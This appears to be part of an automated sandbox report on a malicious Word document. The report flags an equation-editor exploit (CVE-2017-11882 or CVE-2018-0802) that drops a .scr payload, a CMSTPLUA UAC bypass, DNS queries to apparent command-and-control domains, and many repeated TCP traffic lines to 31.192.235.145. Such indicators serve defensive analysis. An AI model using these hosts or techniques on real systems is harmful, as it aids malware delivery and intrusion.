                  Source: Yara matchFile source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 31.192.235.145 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugman23456.scrJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004074FD _wcslen,CoGetObject,25_2_004074FD
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10006580 FindFirstFileExA,12_2_10006580
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407EF8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407898
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409253
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_0041C291
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,25_2_0040C34D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409665
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0044E879 FindFirstFileExA,25_2_0044E879
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,25_2_0040880C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040783C FindFirstFileW,FindNextFileW,25_2_0040783C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,25_2_00419AF5
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,25_2_0040BB30
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,25_2_0040BD37
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,25_2_00407C97
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 4x nop then jmp 00D73B2Dh5_2_00D7316E
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 4x nop then jmp 00D73B2Dh5_2_00D73789
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 4x nop then jmp 00D73B2Dh5_2_00D731BA
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 4x nop then jmp 00D73B2Dh5_2_00D73500
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 4x nop then jmp 00D73B2Dh5_2_00D73283
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 4x nop then jmp 00D73B2Dh5_2_00D732AE
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 4x nop then jmp 00D73B2Dh5_2_00D73263
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 4x nop then jmp 046A340Dh15_2_046A3069
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 4x nop then jmp 046A340Dh15_2_046A2A4E
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 4x nop then jmp 046A340Dh15_2_046A2DE0
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 4x nop then jmp 046A340Dh15_2_046A2A9A
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 4x nop then jmp 046A340Dh15_2_046A2B5E
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 4x nop then jmp 046A340Dh15_2_046A2B8E
                  Source: global trafficDNS query: name: sinopecllc.top
                  Source: global trafficDNS query: name: antfly50.sytes.net
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
